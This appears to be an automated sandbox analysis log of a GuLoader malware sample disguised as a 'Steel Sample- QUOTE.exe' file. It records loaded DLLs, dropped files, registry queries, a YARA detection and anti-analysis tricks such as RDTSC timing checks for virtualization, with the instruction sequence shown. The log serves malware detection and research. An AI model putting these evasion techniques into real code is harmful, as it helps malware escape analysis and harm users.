Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: srvcli.dll	Jump to behavior

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

File written: C:\Users\user\AppData\Roaming\Rigsantikvarernes\anticipatively.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: mshtml.pdb source: Steel Sample- QUOTE.exe, 00000006.00000001.2207406132.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000003.2605414074.0000000035065000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2603146795.0000000034EB9000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3940212352.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3940212352.0000000035210000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Steel Sample- QUOTE.exe, Steel Sample- QUOTE.exe, 00000006.00000003.2605414074.0000000035065000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2603146795.0000000034EB9000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3940212352.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3940212352.0000000035210000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000001.2207406132.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VHmANgjD4Skpj.exe, 0000000F.00000000.2625198364.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000010.00000002.3721450990.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000012.00000000.2848377882.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000013.00000000.2970522596.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000014.00000000.3096517936.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000015.00000000.3303309737.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000016.00000002.3720694991.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000006.00000002.3719545322.0000000002234000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2210528278.00000000056B4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 0_2_10002DB0 push eax; ret		0_2_10002DDE
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3521135D push eax; iretd		6_2_35211369

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

File created: C:\Users\user\AppData\Local\Temp\nsf7045.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	API/Special instruction interceptor: Address: 58719D3
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	API/Special instruction interceptor: Address: 23F19D3

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	RDTSC instruction interceptor: First address: 5834548 second address: 5834548 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7D6C4ED825h 0x00000006 test bh, FFFFFFA8h 0x00000009 cmp bl, cl 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	RDTSC instruction interceptor: First address: 23B4548 second address: 23B4548 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7D6C8C1215h 0x00000006 test bh, FFFFFFA8h 0x00000009 cmp bl, cl 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 6_2_352BD1C0 rdtsc

6_2_352BD1C0

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf7045.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

API coverage: 1.0 %

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe TID: 2308

Thread sleep time: -42000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E

Source: Steel Sample- QUOTE.exe, 00000006.00000002.3913657118.00000000050E8000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2603617259.000000000513B000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2603412304.000000000513B000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3914805097.000000000513B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	API call chain: ExitProcess graph end node			graph_0-4483
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	API call chain: ExitProcess graph end node			graph_0-4489

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 6_2_352BD1C0 rdtsc

6_2_352BD1C0

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 6_2_352835C0 NtCreateMutant,LdrInitializeThunk,

6_2_352835C0

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FB52F mov eax, dword ptr fs:[00000030h]	6_2_352FB52F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35315537 mov eax, dword ptr fs:[00000030h]	6_2_35315537
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]	6_2_352EF525
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]	6_2_352EF525
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]	6_2_352EF525
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]	6_2_352EF525
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]	6_2_352EF525
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]	6_2_352EF525
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]	6_2_352EF525
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]	6_2_3524D534
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]	6_2_3524D534
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]	6_2_3524D534
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]	6_2_3524D534
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]	6_2_3524D534
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]	6_2_3524D534
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527D530 mov eax, dword ptr fs:[00000030h]	6_2_3527D530
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527D530 mov eax, dword ptr fs:[00000030h]	6_2_3527D530
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35277505 mov eax, dword ptr fs:[00000030h]	6_2_35277505
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35277505 mov ecx, dword ptr fs:[00000030h]	6_2_35277505
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B562 mov eax, dword ptr fs:[00000030h]	6_2_3523B562
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527B570 mov eax, dword ptr fs:[00000030h]	6_2_3527B570
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527B570 mov eax, dword ptr fs:[00000030h]	6_2_3527B570
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EB550 mov eax, dword ptr fs:[00000030h]	6_2_352EB550
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EB550 mov eax, dword ptr fs:[00000030h]	6_2_352EB550
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EB550 mov eax, dword ptr fs:[00000030h]	6_2_352EB550
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353135B6 mov eax, dword ptr fs:[00000030h]	6_2_353135B6
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]	6_2_352615A9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]	6_2_352615A9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]	6_2_352615A9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]	6_2_352615A9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]	6_2_352615A9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FF5BE mov eax, dword ptr fs:[00000030h]	6_2_352FF5BE
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]	6_2_3526F5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]	6_2_3526F5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]	6_2_3526F5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]	6_2_3526F5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]	6_2_3526F5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]	6_2_3526F5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]	6_2_3526F5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]	6_2_3526F5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]	6_2_3526F5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D35BA mov eax, dword ptr fs:[00000030h]	6_2_352D35BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D35BA mov eax, dword ptr fs:[00000030h]	6_2_352D35BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D35BA mov eax, dword ptr fs:[00000030h]	6_2_352D35BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352D35BA mov eax, dword ptr fs:[00000030h]	6_2_352D35BA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352DD5B0 mov eax, dword ptr fs:[00000030h]	6_2_352DD5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352DD5B0 mov eax, dword ptr fs:[00000030h]	6_2_352DD5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523758F mov eax, dword ptr fs:[00000030h]	6_2_3523758F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523758F mov eax, dword ptr fs:[00000030h]	6_2_3523758F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523758F mov eax, dword ptr fs:[00000030h]	6_2_3523758F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352CB594 mov eax, dword ptr fs:[00000030h]	6_2_352CB594
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352CB594 mov eax, dword ptr fs:[00000030h]	6_2_352CB594
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]	6_2_352615F4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]	6_2_352615F4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]	6_2_352615F4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]	6_2_352615F4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]	6_2_352615F4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]	6_2_352615F4
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353135D7 mov eax, dword ptr fs:[00000030h]	6_2_353135D7
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353135D7 mov eax, dword ptr fs:[00000030h]	6_2_353135D7
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353135D7 mov eax, dword ptr fs:[00000030h]	6_2_353135D7
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352755C0 mov eax, dword ptr fs:[00000030h]	6_2_352755C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353155C9 mov eax, dword ptr fs:[00000030h]	6_2_353155C9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352BD5D0 mov eax, dword ptr fs:[00000030h]	6_2_352BD5D0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352BD5D0 mov ecx, dword ptr fs:[00000030h]	6_2_352BD5D0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352695DA mov eax, dword ptr fs:[00000030h]	6_2_352695DA
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526340D mov eax, dword ptr fs:[00000030h]	6_2_3526340D
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C7410 mov eax, dword ptr fs:[00000030h]	6_2_352C7410
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]	6_2_35241460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]	6_2_35241460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]	6_2_35241460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]	6_2_35241460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]	6_2_35241460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]	6_2_3525F460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]	6_2_3525F460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]	6_2_3525F460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]	6_2_3525F460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]	6_2_3525F460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]	6_2_3525F460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3531547F mov eax, dword ptr fs:[00000030h]	6_2_3531547F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]	6_2_3524B440
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]	6_2_3524B440
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]	6_2_3524B440
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]	6_2_3524B440
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]	6_2_3524B440
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]	6_2_3524B440
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FF453 mov eax, dword ptr fs:[00000030h]	6_2_352FF453
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EB450 mov eax, dword ptr fs:[00000030h]	6_2_352EB450
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EB450 mov eax, dword ptr fs:[00000030h]	6_2_352EB450
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EB450 mov eax, dword ptr fs:[00000030h]	6_2_352EB450
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352EB450 mov eax, dword ptr fs:[00000030h]	6_2_352EB450
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352374B0 mov eax, dword ptr fs:[00000030h]	6_2_352374B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352374B0 mov eax, dword ptr fs:[00000030h]	6_2_352374B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352734B0 mov eax, dword ptr fs:[00000030h]	6_2_352734B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E74B0 mov eax, dword ptr fs:[00000030h]	6_2_352E74B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35249486 mov eax, dword ptr fs:[00000030h]	6_2_35249486
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35249486 mov eax, dword ptr fs:[00000030h]	6_2_35249486
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B480 mov eax, dword ptr fs:[00000030h]	6_2_3523B480
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E94E0 mov eax, dword ptr fs:[00000030h]	6_2_352E94E0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353154DB mov eax, dword ptr fs:[00000030h]	6_2_353154DB
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FF72E mov eax, dword ptr fs:[00000030h]	6_2_352FF72E
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35243720 mov eax, dword ptr fs:[00000030h]	6_2_35243720
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525F720 mov eax, dword ptr fs:[00000030h]	6_2_3525F720
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525F720 mov eax, dword ptr fs:[00000030h]	6_2_3525F720
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525F720 mov eax, dword ptr fs:[00000030h]	6_2_3525F720
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3531B73C mov eax, dword ptr fs:[00000030h]	6_2_3531B73C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3531B73C mov eax, dword ptr fs:[00000030h]	6_2_3531B73C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3531B73C mov eax, dword ptr fs:[00000030h]	6_2_3531B73C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3531B73C mov eax, dword ptr fs:[00000030h]	6_2_3531B73C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35239730 mov eax, dword ptr fs:[00000030h]	6_2_35239730
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35239730 mov eax, dword ptr fs:[00000030h]	6_2_35239730
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35275734 mov eax, dword ptr fs:[00000030h]	6_2_35275734
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530972B mov eax, dword ptr fs:[00000030h]	6_2_3530972B
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524973A mov eax, dword ptr fs:[00000030h]	6_2_3524973A
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3524973A mov eax, dword ptr fs:[00000030h]	6_2_3524973A
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35245702 mov eax, dword ptr fs:[00000030h]	6_2_35245702
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35245702 mov eax, dword ptr fs:[00000030h]	6_2_35245702
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35247703 mov eax, dword ptr fs:[00000030h]	6_2_35247703
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527F71F mov eax, dword ptr fs:[00000030h]	6_2_3527F71F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3527F71F mov eax, dword ptr fs:[00000030h]	6_2_3527F71F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B765 mov eax, dword ptr fs:[00000030h]	6_2_3523B765
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B765 mov eax, dword ptr fs:[00000030h]	6_2_3523B765
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B765 mov eax, dword ptr fs:[00000030h]	6_2_3523B765
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523B765 mov eax, dword ptr fs:[00000030h]	6_2_3523B765
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35253740 mov eax, dword ptr fs:[00000030h]	6_2_35253740
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35253740 mov eax, dword ptr fs:[00000030h]	6_2_35253740
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35253740 mov eax, dword ptr fs:[00000030h]	6_2_35253740
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]	6_2_352E375F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]	6_2_352E375F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]	6_2_352E375F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]	6_2_352E375F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]	6_2_352E375F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35313749 mov eax, dword ptr fs:[00000030h]	6_2_35313749
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]	6_2_352CF7AF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]	6_2_352CF7AF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]	6_2_352CF7AF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]	6_2_352CF7AF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]	6_2_352CF7AF
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352C97A9 mov eax, dword ptr fs:[00000030h]	6_2_352C97A9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353137B6 mov eax, dword ptr fs:[00000030h]	6_2_353137B6
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3526D7B0 mov eax, dword ptr fs:[00000030h]	6_2_3526D7B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]	6_2_3523F7BA
